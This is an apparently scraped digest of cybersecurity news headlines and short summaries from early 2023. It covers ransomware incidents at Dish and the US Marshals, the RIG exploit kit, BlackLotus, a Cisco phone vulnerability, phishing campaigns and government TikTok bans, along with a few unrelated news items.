                Cisco addressed a critical vulnerability, tracked as CVE-2023-20078, impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. Cisco released security updates to address a critical flaw impacting its IP Phone 6800, 7800, 7900, and 8800 Series products. The flaw, tracked as CVE-2023-20078 (rated 9.8 out of 10), is a command injection issue that resides […]

                The post Cisco fixed a critical command injection bug in IP Phone Series appeared first on Security Affairs.

                "

                Autosummary: “A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 Series Multiplatform Phones, as well as Cisco Unified IP Conference Phone 8831 and Unified IP Phone 7900 Series Phones, could allow an unauthenticated, remote attacker to cause an affected device to reload, resulting in a denial of service (DoS) condition.” reads the advisory. "


                Hatch Bank discloses data breach after GoAnywhere MFT hack

                financial
                2023-03-02 https://www.bleepingcomputer.com/news/security/hatch-bank-discloses-data-breach-after-goanywhere-mft-hack/
                Fintech banking platform Hatch Bank has reported a data breach after hackers stole the personal information of almost 140,000 customers from the company’s Fortra GoAnywhere MFT secure file-sharing platform. [...] "

                Autosummary: The Accellion FTA attacks caused widespread damage, with numerous organizations disclosing related breaches, including Morgan Stanley, Qualys, energy giant Shell, supermarket giant Kroger. "


                Internet Explorer users still targeted by RIG exploit kit

                exploits
                2023-03-02 https://www.malwarebytes.com/blog/news/2023/03/internet-explorer-users-still-targeted-by-rig-exploit-kit

                Categories: News

                Tags: RIG EK

                Tags: exploit kit

                Tags: MakeMoney

                Tags: Internet Explorer

                Tags: Jerome Segura

                The RIG Exploit Kit is one of the last major exploit kits that still targets the legacy Internet Explorer browser.

                (Read more...)

                The post Internet Explorer users still targeted by RIG exploit kit appeared first on Malwarebytes Labs.

                "

                Autosummary: 2020 analysis of malvertising leading to the RIG Exploit Kit We connected some RIG EK activity with the cybercriminal behind the "MakeMoney gate" (a name coined by security researcher @nao_sec) based on the domain makemoneywithus[.]work (188.225.75.54) with the earliest instance of this threat group seen in December 2019 via the gate gettime[.]xyz (185.220.35.26). "


                Ransomware led to multiple DISH Network outages

                exploits
                2023-03-02 https://www.malwarebytes.com/blog/news/2023/03/ransomware-led-to-multiple-dish-network-outages

                Categories: News

                Tags: DISH network

                Tags: ransomware

                Tags: SEC

                Tags: attack

                Tags: compromise

                Tags: outage

                We take a look at a ransomware outbreak impacting multiple DISH Network services.

                (Read more...)

                The post Ransomware led to multiple DISH Network outages appeared first on Malwarebytes Labs.

                "

                Autosummary: Downtime and confusion. To give some idea of the scale of the outage, services impacted according to Silicon include some of the below: Dish.com, the Dish Anywhere app, Boost Mobile, and “other websites and networks” operated and owned by DISH Network. Customers are without various services, and the Dish website is still sporting a “Thank you for your patience” message along with the link to a statement which includes the following message: The security of our customers’ data is important to us, and if we learn that information was compromised, we’ll take the appropriate steps and let any impacted customers know. A timeline of ransomware: DISH filed an 8-K form, used to inform shareholders of major events, to explain the situation. As a result of this incident, many of our customers are having trouble reaching our service desks, accessing their accounts, and making payments. "


                Covert cyberattacks on the rise as attackers shift tactics for maximum impact

                industry ciber
                2023-03-01 https://www.helpnetsecurity.com/2023/03/01/shifting-attack-strategies/

                2022 was the second-highest year on record for global ransomware attempts, as well as an 87% increase in IoT malware and a record number of cryptojacking attacks (139.3 million), according to SonicWall. “The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of … More

                The post Covert cyberattacks on the rise as attackers shift tactics for maximum impact appeared first on Help Net Security.

                "

                Autosummary: "


                Cybercriminals Targeting Law Firms with GootLoader and FakeUpdates Malware

                exploits ciber
                2023-03-01 https://thehackernews.com/2023/03/cybercriminals-targeting-law-firms-with.html
                Six different law firms were targeted in January and February 2023 as part of two disparate threat campaigns distributing GootLoader and FakeUpdates (aka SocGholish) malware strains. GootLoader, active since late 2020, is a first-stage downloader that's capable of delivering a wide range of secondary payloads such as Cobalt Strike and ransomware. It notably employs search engine optimization ( "

                Autosummary: "This has been largely thanks to GootLoader, SocGholish, SolarMarker, and recent campaigns leveraging Google Ads to float top search results." "


                BlackLotus Becomes First UEFI Bootkit Malware to Bypass Secure Boot on Windows 11

                exploits
                2023-03-01 https://thehackernews.com/2023/03/blacklotus-becomes-first-uefi-bootkit.html
                A stealthy Unified Extensible Firmware Interface (UEFI) bootkit called BlackLotus has become the first publicly known malware capable of bypassing Secure Boot defenses, making it a potent threat in the cyber landscape. "This bootkit can run even on fully up-to-date Windows 11 systems with UEFI Secure Boot enabled," Slovak cybersecurity company ESET said in a report shared with The Hacker News. "

                Autosummary: "This represents a bit of a 'leap' forward, in terms of ease of use, scalability, accessibility, and most importantly, the potential for much more impact in the forms of persistence, evasion, and/or destruction," Eclypsium's Scott Scheferman noted. "


                Iron Tiger hackers create Linux version of their custom malware

                exploits
                2023-03-01 https://www.bleepingcomputer.com/news/security/iron-tiger-hackers-create-linux-version-of-their-custom-malware/
                The APT27 hacking group, aka "Iron Tiger," has prepared a new Linux version of its SysUpdate custom remote access malware, allowing the Chinese cyberespionage group to target more services used in the enterprise. [...] "

                Autosummary: SysUpdate infection chain (Trend Micro). SysUpdate is a feature-rich remote access tool allowing a threat actor to perform a variety of malicious behavior as listed below: service manager (lists, starts, stops, and deletes services); screenshot grab; process manager (browses and terminates processes); drive information retrieval; file manager (finds, deletes, renames, uploads, downloads a file, and browses a directory); command execution. Trend Micro comments that Iron Tiger used a Wazuh-signed executable in later sideloading stages to blend with the victim's environment, as the target organization used the legitimate Wazuh platform. "


                Microsoft fixes bug behind apps not installing during provisioning

                exploits
                2023-03-01 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-behind-apps-not-installing-during-provisioning/
                Microsoft has addressed a Windows 11 22H2 known issue causing some apps not to be installed during Windows provisioning. [...] "

                Autosummary: "


                How to Prevent Callback Phishing Attacks on Your Organization

                financial
                2023-03-01 https://www.bleepingcomputer.com/news/security/how-to-prevent-callback-phishing-attacks-on-your-organization/
                Hybrid phishing attacks continue to pose a clear and present danger to all organizations. How can these threats be mitigated to reduce their impact? [...] "

                Autosummary: Organizations must have a strong culture of security, and a first step to strengthening cybersecurity awareness is setting up training programs specifically for phishing messages that invoke fear or a sense of urgency, unexpected invoices, and requests to establish a phone call or install software. What is clear, and as ProofPoint illustrates in their report, is that developing a strong culture of cybersecurity is the most effective defence against personalized attacks, such as callback phishing. "


                Satellite TV giant Dish admitted that the recent outage was caused by a ransomware attack

                exploits ransomware
                2023-03-01 https://securityaffairs.com/142858/data-breach/dish-admitted-ransomware-attack.html

                Satellite TV giant Dish Network has confirmed that the recent outage was caused by a ransomware attack, it also disclosed a data breach. Satellite TV giant Dish Network finally admitted that the recent outage was caused by a ransomware attack. The American satellite broadcast provider went offline on February 24, 2023, the outage impacted Dish.com, […]

                The post Satellite TV giant Dish admitted that the recent outage was caused by a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Russia bans foreign messaging apps in government organizations

                government
                2023-03-01 https://www.bleepingcomputer.com/news/security/russia-bans-foreign-messaging-apps-in-government-organizations/
                Russia's internet watchdog agency Roskomnadzor is warning that today is the first day that laws banning the use of many foreign private messaging applications in the country come into force. [...] "

                Autosummary: The banned services mentioned by Roskomnadzor include the following: Discord – Game-focused VoIP and instant messaging social platform based in San Francisco, U.S. Microsoft Teams – American business communication platform. "


                Canada is going to ban TikTok on government mobile devices

                government
                2023-03-01 https://securityaffairs.com/142880/security/canada-bans-tiktok-government-devices.html

                The Canadian government announced it will ban the video app TikTok from all government-issued devices over security concerns. Canada is going to ban the popular Chinese video-sharing app TikTok from the mobile devices of its employees over security concerns. The app will be removed from government devices this week. The app “presents an unacceptable level […]

                The post Canada is going to ban TikTok on government mobile devices appeared first on Security Affairs.

                "

                Autosummary: "


                Trezor warns of massive crypto wallet phishing campaign

                financial
                2023-03-01 https://www.bleepingcomputer.com/news/security/trezor-warns-of-massive-crypto-wallet-phishing-campaign/
                An ongoing phishing campaign is pretending to be Trezor data breach notifications attempting to steal a target's cryptocurrency wallet and its assets. [...] "

                Autosummary: Landing page for Trezor phishing site (Source: Urlscan). When users click the "Start" button, they will ultimately be prompted to enter their recovery seed, which the threat actors will then steal. When setting up a new Trezor wallet, users are given a 12 or 24-word recovery seed that can be used to recover a wallet if a device is stolen, lost, or malfunctions. "


                AI voice cracks telephone banking voice recognition

                financial
                2023-03-01 https://www.malwarebytes.com/blog/news/2023/02/ai-generated-voice-recording-grants-access-to-telephone-banking

                Categories: News

                Tags: AI

                Tags: voice

                Tags: generated

                Tags: synthetic

                Tags: bank

                Tags: banking

                Tags: telephone

                Tags: login

                Tags: account

                Now that we have freely available artificial intelligence happily replicating people’s voices, could it be a security risk?

                (Read more...)

                The post AI voice cracks telephone banking voice recognition appeared first on Malwarebytes Labs.

                "

                Autosummary: Voice, fingerprint, face, and iris recognition all rely on a judgement of similarity, which creates opportunities for enterprising criminals who can produce realistic facsimiles. "


                U.S. Marshals Service investigating ransomware attack, data theft

                exploits ransomware
                2023-02-28 https://www.bleepingcomputer.com/news/security/us-marshals-service-investigating-ransomware-attack-data-theft/
                The U.S. Marshals Service (USMS) is investigating the theft of sensitive law enforcement information following a ransomware attack that has impacted what it describes as "a stand-alone USMS system." [...] "

                Autosummary: "


                10 US states that suffered the most devastating data breaches in 2022

                financial government
                2023-02-28 https://www.helpnetsecurity.com/2023/02/28/reported-data-breaches-us/

                Cyber attack risks faced by businesses across states and reported data breaches are relative to the respective state governments’ cybersecurity investment, according to Network Assured. Study methodology: Network Assured compared data from State Attorneys General and the Department of Health and Human Services (HHS) Centers for Medicare and Medicaid Services (CMS) Office of Civil Rights’ (OCR), along with public reporting of state budgets for cybersecurity. The study also compared data breach statistics with the number … More

                The post 10 US states that suffered the most devastating data breaches in 2022 appeared first on Help Net Security.

                "

                Autosummary: No state is safe from data breaches. While California, as expected given its high concentration of businesses in technology and healthcare, recorded the highest number of data breaches at 1,338, the relatively small state of Maryland ranked 5th worst in the nation with 343 breaches. "


                Canada bans TikTok on government devices

                government
                2023-02-28 https://www.bbc.co.uk/news/world-us-canada-64792894?at_medium=RSS&at_campaign=KARANGA
                The federal government says the video app is an "unacceptable" risk to privacy and security. "

                Autosummary: "


                APT-C-36 Strikes Again: Blind Eagle Hackers Target Key Industries in Colombia

                latam
                2023-02-28 https://thehackernews.com/2023/02/apt-c-36-strikes-again-blind-eagle.html
                The threat actor known as Blind Eagle has been linked to a new campaign targeting various key industries in Colombia. The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group's victimology footprint. Targeted entities include health, financial, law "

                Autosummary: The activity, which was detected by the BlackBerry Research and Intelligence Team on February 20, 2023, is also said to encompass Ecuador, Chile, and Spain, suggesting a slow expansion of the hacking group's victimology footprint. "


                CISA Issues Warning on Active Exploitation of ZK Java Web Framework Vulnerability

                exploits
                2023-02-28 https://thehackernews.com/2023/02/cisa-issues-warning-on-active.html
                The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity flaw affecting the ZK Framework to its Known Exploited Vulnerabilities (KEV) catalog based on evidence of active exploitation. Tracked as CVE-2022-36537 (CVSS score: 7.5), the issue impacts ZK Framework versions 9.6.1, 9.6.0.1, 9.5.1.3, 9.0.1.2, and 8.6.4.1, and allows threat actors to retrieve sensitive "

                Autosummary: "


                Resecurity identified the investment scam network ‘Digital Smoke’

                financial
                2023-02-28 https://securityaffairs.com/142803/cyber-crime/investment-scam-network-digital-smoke.html

                Resecurity identified one of the largest investment fraud networks, tracked as Digital Smoke, by size and volume of operations. Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, the European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, […]

                The post Resecurity identified the investment scam network ‘Digital Smoke’ appeared first on Security Affairs.

                "

                Autosummary: Notably, the bad actors have chosen high-demand investment areas to impersonate world-known brands including ABRDN (UK), Blackrock (US), Baxter Medical (US), EvGo (US), Ferrari (Italy), ITC Hotels (India), Eaton Corporation (US/UK), Novuna Business Finance (UK), Tata (India), Valesto Oil (Malaysia), Lloyds Bank (UK), and many more. Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, the European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, Mexico, the U.S. and other regions. "


                New EX-22 Tool Empowers Hackers with Stealthy Ransomware Attacks on Enterprises

                exploits ransomware
                2023-02-28 https://thehackernews.com/2023/02/new-ex-22-tool-empowers-hackers-with.html
                A new post-exploitation framework called EXFILTRATOR-22 (aka EX-22) has emerged in the wild with the goal of deploying ransomware within enterprise networks while flying under the radar. "It comes with a wide range of capabilities, making post-exploitation a cakewalk for anyone purchasing the tool," CYFIRMA said in a new report. Some of the notable features include establishing a reverse shell "

                Autosummary: "


                Bitdefender Releases Free Decryptor for MortalKombat Ransomware Strain

                exploits ransomware
                2023-02-28 https://thehackernews.com/2023/02/bitdefender-releases-free-decryptor-for.html
                Romanian cybersecurity company Bitdefender has released a free decryptor for a new ransomware strain known as MortalKombat. MortalKombat is a new ransomware strain that emerged in January 2023. It's based on commodity ransomware dubbed Xorist and has been observed in attacks targeting entities in the U.S., the Philippines, the U.K., and Turkey. Xorist, detected since 2010, is distributed as a "

                Autosummary: "MortalKombat encrypts various files on the victim machine's filesystem, such as system, application, database, backup, and virtual machine files, as well as files on the remote locations mapped as logical drives in the victim's machine," Cisco Talos disclosed earlier this month. "


                CISA adds ZK Java Web Framework bug to Known Exploited Vulnerabilities Catalog

                exploits
                2023-02-28 https://securityaffairs.com/142811/security/zk-java-web-framework-flaw.html

                US CISA added an actively exploited vulnerability in the ZK Java Web Framework to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a vulnerability, tracked as CVE-2022-36537 (CVSS score: 7.5), in the ZK Java Web open-source framework to its Known Exploited Vulnerabilities Catalog. An attacker can exploit the flaw to retrieve […]

                The post CISA adds ZK Java Web Framework bug to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

                "

                Autosummary: "


                Ovidio Guzmán: US asks Mexico to extradite El Chapo's son

                latam
                2023-02-28 https://www.bbc.co.uk/news/world-latin-america-64797073?at_medium=RSS&at_campaign=KARANGA
                Ovidio Guzmán was arrested in January after a gun battle in which more than a dozen people died. "

                Autosummary: "


                TikTok answers three big cybersecurity fears about the app

                ciber
                2023-02-28 https://www.bbc.co.uk/news/technology-64797355?at_medium=RSS&at_campaign=KARANGA
                Calls in the US for a ban on TikTok have reignited the global debate about its cybersecurity risks. "

                Autosummary: Image caption (source: Getty Images): The Chinese version of TikTok, called Douyin, shares the same format and basic engineering code. At the start of TikTok's ascendancy, there were high-profile cases of censorship on the app: a user in the US had her account suspended for discussing Beijing's treatment of Muslims in Xinjiang; after a fierce public backlash, TikTok apologised and reinstated the account. Image caption (source: Getty Images): Shanghai tech giant ByteDance owns TikTok and its sister app Douyin. Article seven of China's National Intelligence Law states that all Chinese organisations and citizens should "support, assist and co-operate" with Chinese intelligence efforts. In November 2022, Christopher Wray, director of the Federal Bureau of Investigation (FBI), told US lawmakers: "The Chinese government could… control the recommendation algorithm, which could be used for influence operations. "


                New MortalKombat ransomware decryptor recovers your files for free

                exploits ransomware
                2023-02-28 https://www.bleepingcomputer.com/news/security/new-mortalkombat-ransomware-decryptor-recovers-your-files-for-free/
                Cybersecurity company Bitdefender has released a free MortalKombat ransomware decryptor that victims can use to restore their files without paying a ransom. [...] "

                Autosummary: Bitdefender's decryptor for MortalKombat ransomware (BleepingComputer). Moreover, there’s an option to replace previously decrypted files, products of partially successful decryption attempts, with new, clean versions. "


                Dish Network confirms ransomware attack behind multi-day outage

                exploits ransomware
                2023-02-28 https://www.bleepingcomputer.com/news/security/dish-network-confirms-ransomware-attack-behind-multi-day-outage/
                Satellite broadcast provider and TV giant Dish Network has finally confirmed that a ransomware attack was the cause of a multi-day network and service outage that started on Friday. [...] "

                Autosummary: The company added that the filed information relates to its "expectations regarding its ability to contain, assess and remediate the ransomware attack and the impact of the ransomware attack on the Corporation's employees, customers, business, operations or financial results. "


                U.S. Marshals Service suffers a ransomware attack

                exploits ransomware
                2023-02-28 https://securityaffairs.com/142823/cyber-crime/u-s-marshals-service-suffers-a-ransomware-attack.html

                The U.S. Marshals Service (USMS) was the victim of a ransomware attack, it is investigating the theft of sensitive information. The U.S. Marshals Service (USMS) announced that a ransomware attack has impacted “a stand-alone USMS system.” The US bureau is investigating the theft of sensitive information following the security breach. The infection occurred on February […]

                The post U.S. Marshals Service suffers a ransomware attack appeared first on Security Affairs.

                "

                Autosummary: "


                Peruvian delivery man carried ancient mummy around in his bag

                latam
                2023-02-28 https://www.bbc.co.uk/news/world-latin-america-64797080?at_medium=RSS&at_campaign=KARANGA
                The Peruvian man said he wanted to show off the mummy, which is at least 600 years old, to his friends. "

                Autosummary: "


                Tesla to build new factory in Mexico

                latam industry
                2023-02-28 https://www.bbc.co.uk/news/business-64803467?at_medium=RSS&at_campaign=KARANGA
                Elon Musk's electric car company joins other firms investing south of the US border. "

                Autosummary: "


                CISA warns of hackers exploiting ZK Java Framework RCE flaw

                exploits
                2023-02-28 https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-zk-java-framework-rce-flaw/
                The U.S. Cybersecurity & Infrastructure Security Agency (CISA) has added CVE-2022-36537 to its "Known Exploited Vulnerabilities Catalog" after threat actors began actively exploiting the remote code execution (RCE) flaw in attacks. [...] "

                Autosummary: "


                Bitdefender released a free decryptor for the MortalKombat Ransomware family

                exploits ransomware
                2023-02-28 https://securityaffairs.com/142830/malware/mortalkombat-ransomware-free-decryptor.html

                Antivirus company Bitdefender has released a free decryptor for the recently discovered ransomware family MortalKombat. Good news for the victims of the recently discovered MortalKombat ransomware: the antivirus firm Bitdefender has released a free decryptor that will allow them to recover their files without paying the ransom. Since December 2022, Cisco Talos researchers have been observing an unidentified financially […]

                The post Bitdefender released a free decryptor for the MortalKombat Ransomware family appeared first on Security Affairs.

                "

                Autosummary: "


                US Marshals Service hit by ransomware and data breach

                financial exploits ransomware
                2023-02-28 https://www.malwarebytes.com/blog/news/2023/02/us-marshals-service-hit-by-ransomware-and-data-breach

                Categories: News

                Categories: Ransomware

                Tags: US Marshalls

                Tags: WITSEC

                Tags: usms

                Tags: ransomware

                The US Marshals Service has suffered a ransomware attack in which an attacker managed to get hold of sensitive information about staff and fugitives.

                (Read more...)

                The post US Marshals Service hit by ransomware and data breach appeared first on Malwarebytes Labs.

                "

                Autosummary: On February 17, 2023, the attacker infiltrated a system that held information about ongoing investigations, including personally identifiable information (PII) of fugitives, staff, and third parties. Investigation: According to Drew Wade, spokesperson for the USMS: "Shortly after that discovery, the USMS disconnected the affected system, and the Department of Justice initiated a forensic investigation." Posted: February 28, 2023. "


                ESET Research Podcast: Ransomware trashed data, Android threats soared in T3 2022

                exploits ransomware
                2023-02-28 https://www.welivesecurity.com/2023/02/28/eset-research-podcast-ransomware-trashed-data-android-threats/

                And that’s just the tip of the iceberg when it comes to the trends that defined the cyberthreat landscape in the final four months of 2022.

                The post ESET Research Podcast: Ransomware trashed data, Android threats soared in T3 2022 appeared first on WeLiveSecurity

                "

                Autosummary: "


                Mexico protests: Huge crowds rally against electoral reform

                latam
                2023-02-27 https://www.bbc.co.uk/news/world-latin-america-64781306?at_medium=RSS&at_campaign=KARANGA
                People marched on the presidential palace in Mexico City, where organisers claim 500,000 gathered. "

                Autosummary: "


                Missing Chinese tech banker "assisting" authorities

                financial
                2023-02-27 https://www.bbc.co.uk/news/business-64781374?at_medium=RSS&at_campaign=KARANGA
                Bao Fan's disappearance this month renewed concerns of a potential crackdown on finance and tech figures. "

                Autosummary: "


                Stay one step ahead: Cybersecurity best practices to prevent breaches

                ciber
                2023-02-27 https://www.helpnetsecurity.com/2023/02/27/cybersecurity-best-practices-to-prevent-breaches-video/

                In this Help Net Security video, Caroline Wong, Chief Strategy Officer at Cobalt, offers valuable insight into what leaders can do to instill stronger cybersecurity practices from the bottom up and prevent breaches.

                The post Stay one step ahead: Cybersecurity best practices to prevent breaches appeared first on Help Net Security.

                "

                Autosummary: "


                Wiper malware goes global, destructive attacks surge

                exploits
                2023-02-27 https://www.helpnetsecurity.com/2023/02/27/destructive-wiper-malware/

                The threat landscape and organizations’ attack surface are constantly transforming, and cybercriminals’ ability to design and adapt their techniques to suit this evolving environment continues to pose significant risk to businesses of all sizes, regardless of industry or geography. Destructive APT-like wiper malware spreads wide Analyzing wiper malware data reveals a trend of cyber adversaries consistently using destructive attack techniques against their targets. It also shows that with the lack of borders on the internet, … More

                The post Wiper malware goes global, destructive attacks surge appeared first on Help Net Security.

                "

                Autosummary: Specifically, in the second half of 2022, significant targets of Mirai included managed security service providers (MSSPs), the telco/carrier sector, and the manufacturing sector, which is known for its pervasive operational technology (OT). It is possible that the long-tail legacy of this criminal group is still perpetuating, or the code has simply been built upon, changed, and re-released, demonstrating the importance of global partnerships across all types of organizations to permanently dismantle criminal operations. "To counter, adversaries are augmenting with more reconnaissance techniques and deploying more sophisticated attack alternatives to enable their destructive attempts with APT-like threat methods such as wiper malware or other advanced payloads,” said Derek Manky, Chief Security Strategist & Global VP Threat Intelligence, FortiGuard Labs. "


                Resecurity identified the investment scam network Digital Smoke

                financial
                2023-02-27 https://www.helpnetsecurity.com/2023/02/27/resecurity-identified-the-investment-scam-network-digital-smoke/

                Resecurity identified one of the largest investment fraud networks by size and volume of operations created to defraud Internet users from Australia, Canada, China, Colombia, European Union, India, Singapore, Malaysia, United Arab Emirates, Saudi Arabia, Mexico, the U.S. and other regions. The bad actors operating as an organized crime syndicate developed a massive infrastructure to impersonate popular Fortune 100 corporations from the U.S and the U.K by using their brands and market reputation to defraud … More

                The post Resecurity identified the investment scam network Digital Smoke appeared first on Help Net Security.

                "

                Autosummary: Notably, the bad actors have chosen high-demand investment areas to impersonate world-known brands including ABRDN (UK), Blackrock (US), Baxter Medical (US), EvGo (US), Ferrari (Italy), ITC Hotels (India), Eaton Corporation (US/UK), Novuna Business Finance (UK), Tata (India), Valesto Oil (Malaysia), Lloyds Bank (UK), and many more.


                FTC reveals alarming increase in scam activity, costing consumers billions

                financial
                2023-02-27 https://www.helpnetsecurity.com/2023/02/27/ftc-scams-fraud-costing-consumers-billions/

                Newly released Federal Trade Commission (FTC) data shows that consumers reported losing nearly $8.8 billion to fraud in 2022, an increase of more than 30 percent over the previous year. Losing money to investment and imposter scams Consumers reported losing more money to investment scams – more than $3.8 billion—than any other category in 2022. That amount more than doubles the amount reported lost in 2021. The second-highest reported loss amount came from imposter scams, … More

                The post FTC reveals alarming increase in scam activity, costing consumers billions appeared first on Help Net Security.

                "

                Autosummary: "


                PureCrypter Malware Targets Government Entities in Asia-Pacific and North America

                exploits government
                2023-02-27 https://thehackernews.com/2023/02/purecrypter-malware-targets-government.html
                Government entities in Asia-Pacific and North America are being targeted by an unknown threat actor with an off-the-shelf malware downloader known as PureCrypter to deliver an array of information stealers and ransomware. "The PureCrypter campaign uses the domain of a compromised non-profit organization as a command-and-control (C2) to deliver a secondary payload," Menlo Security researcher



                PlugX Trojan Disguised as Legitimate Windows Debugger Tool in Latest Attacks

                exploits
                2023-02-27 https://thehackernews.com/2023/02/plugx-trojan-disguised-as-legitimate.html
                The PlugX remote access trojan has been observed masquerading as an open source Windows debugger tool called x64dbg in an attempt to circumvent security protections and gain control of a target system. "This file is a legitimate open-source debugger tool for Windows that is generally used to examine kernel-mode and user-mode code, crash dumps, or CPU registers," Trend Micro researchers Buddy



                Microsoft fixes bug offering Windows 11 upgrades to unsupported PCs

                exploits
                2023-02-27 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-bug-offering-windows-11-upgrades-to-unsupported-pcs/
                Microsoft has addressed a known issue behind unsupported computers being offered Windows 11 22H2 upgrades and being unable to complete the installation process. [...]



                QNAP starts bug bounty program with rewards up to $20,000

                exploits
                2023-02-27 https://www.helpnetsecurity.com/2023/02/27/qnap-bug-bounty-program/

                QNAP Systems, the Taiwanese manufacturer of popular NAS and other on-premise storage, smart networking and video devices, has launched a bug bounty program. QNAP’s NAS devices, in particular, have been getting hit in the last few years by information-stealing malware, bitcoin-mining malware, and ransomware, usually delivered by exploiting vulnerabilities. About the QNAP bug bounty program “Our security bounty program only accepts security vulnerabilities in QNAP products and services. Out-of-scope vulnerabilities will not be eligible for … More

                The post QNAP starts bug bounty program with rewards up to $20,000 appeared first on Help Net Security.

                "

                Autosummary: "


                ChromeLoader Malware Targeting Gamers via Fake Nintendo and Steam Game Hacks

                exploits
                2023-02-27 https://thehackernews.com/2023/02/chromeloader-malware-targeting-gamers.html
                A new ChromeLoader malware campaign has been observed being distributed via virtual hard disk (VHD) files, marking a deviation from the ISO optical disc image format. "These VHD files are being distributed with filenames that make them appear like either hacks or cracks for Nintendo and Steam games," AhnLab Security Emergency response Center (ASEC) said in a report last week. ChromeLoader (aka



                PlugX Trojan disguised as a legitimate Windows open-source tool in recent attacks

                exploits
                2023-02-27 https://securityaffairs.com/142770/malware/plugx-trojan-disguised-windows-tool.html

                Researchers detailed a new wave of attacks distributing the PlugX RAT disguised as a legitimate Windows debugger tool. Trend Micro uncovered a new wave of attacks aimed at distributing the PlugX remote access trojan masqueraded as an open-source Windows debugger tool called x32dbg. The legitimate tool allows to examine kernel-mode and user-mode code, crash dumps, or CPU […]

                The post PlugX Trojan disguised as a legitimate Windows open-source tool in recent attacks appeared first on Security Affairs.

                "

                Autosummary: "


                Critical flaws in WordPress Houzez theme exploited to hijack websites

                exploits
                2023-02-27 https://www.bleepingcomputer.com/news/security/critical-flaws-in-wordpress-houzez-theme-exploited-to-hijack-websites/
                Hackers are actively exploiting two critical-severity vulnerabilities in the Houzez theme and plugin for WordPress, two premium add-ons used primarily in real estate websites. [...]

                Autosummary: "Since the desired user role can be provided by the user, but is not validated properly on the server side, it can be set to the "administrator" value in order to create a new account that has the administrator user role," PatchStack researcher D. Jong told BleepingComputer. "


                RIG Exploit Kit still infects enterprise users via Internet Explorer

                exploits
                2023-02-27 https://www.bleepingcomputer.com/news/security/rig-exploit-kit-still-infects-enterprise-users-via-internet-explorer/
                The RIG Exploit Kit is undergoing its most successful period, attempting roughly 2,000 intrusions daily and succeeding in about 30% of cases, the highest ratio in the service's long operational history. [...]

                Autosummary: A variety of malicious payloads. Currently, RIG EK primarily pushes information-stealing and initial access malware, with Dridex being the most common (34%), followed by SmokeLoader (26%), RaccoonStealer (20%), Zloader (2.5%), Truebot (1.8%), and IcedID (1.4%). The most impacted countries are Germany, Italy, France, Russia, Turkey, Saudi Arabia, Egypt, Algeria, Mexico, and Brazil.


                Software bugs that bug me – and how to swat them down

                exploits
                2023-02-27 https://www.computerworld.com/article/3689155/software-bugs-that-bug-me-and-how-to-swat-them-down.html#tk.rss_security

                Nearly every day, software updates of some kind roll out for our systems. From operating systems to antivirus software, to cloud services, to hardware devices, virtually none of the technology we use is static. And with these updates come side effects and problems that sometimes take a while to get fixed.

                I recently found an interesting bug that hasn’t gotten a lot of attention when I purchased a Lexmark multi-function printer. As part of the installation process, I went online to download the latest printer driver. (I always recommend going to a vendor website to grab the latest drivers because, after all, the latest software should have the latest fixes, right?) I was able to set up the printer to print, scan, and electronically fax and figured I was done for the day.


                Autosummary: Here’s what the error looks like:
                Faulting application name: mstsc.exe, version: 10.0.19041.2075, time stamp: 0x63f96292
                Faulting module name: LMFX1N4Z.DLL, version: 0.0.1.0, time stamp: 0x61b8cf09
                Exception code: 0xc0000005
                Fault offset: 0x0000000000038ac3
                Faulting process id: 0x2b30
                Faulting application start time: 0x01d948e5ef27f462
                Faulting application path: C:\WINDOWS\system32\mstsc.exe
                Faulting module path: C:\WINDOWS\system32\spool\DRIVERS\x64\3\LMFX1N4Z.DLL
                Report Id: 5b058189-0b5a-4284-a62d-c583bbe5a7da
                Faulting package full name:
                Faulting package-relative application ID:
                Included in that event is the clue I needed. Searching online, I found another computer user facing a similar issue, but with a virtual machine, not a remote desktop client.


                “Ethical hacker” amongst those arrested in Dutch ransomware investigation

                exploits ransomware
                2023-02-27 https://www.bitdefender.com/blog/hotforsecurity/ethical-hacker-amongst-those-arrested-in-dutch-ransomware-investigation/
                Three men have been arrested by Dutch police in connection with ransomware attacks that blackmailed thousands of companies. Amongst them? An ethical hacker. Read more in my article on the Hot for Security blog.



                Researchers Share New Insights Into RIG Exploit Kit Malware's Operations

                exploits
                2023-02-27 https://thehackernews.com/2023/02/researchers-share-new-insights-into-rig.html
                The RIG exploit kit (EK) touched an all-time high successful exploitation rate of nearly 30% in 2022, new findings reveal. "RIG EK is a financially-motivated program that has been active since 2014," Swiss cybersecurity company PRODAFT said in an exhaustive report shared with The Hacker News. "Although it has yet to substantially change its exploits in its more recent activity, the type and

                Autosummary: Other browser flaws weaponized by the malware include CVE-2013-2551, CVE-2014-6332, CVE-2015-0313, CVE-2015-2419, CVE-2016-0189, CVE-2018-8174, CVE-2019-0752, and CVE-2020-0674. According to data collected by PRODAFT, 45% of the successful infections in 2022 leveraged CVE-2021-26411, followed by CVE-2016-0189 (29%), CVE-2019-0752 (10%), CVE-2018-8174 (9%), and CVE-2020-0674 (6%).


                New Exfiltrator-22 post-exploitation kit linked to LockBit ransomware

                exploits ransomware
                2023-02-27 https://www.bleepingcomputer.com/news/security/new-exfiltrator-22-post-exploitation-kit-linked-to-lockbit-ransomware/
                Threat actors are promoting a new "Exfiltrator-22" post-exploitation framework designed to spread ransomware in corporate networks while evading detection. [...]

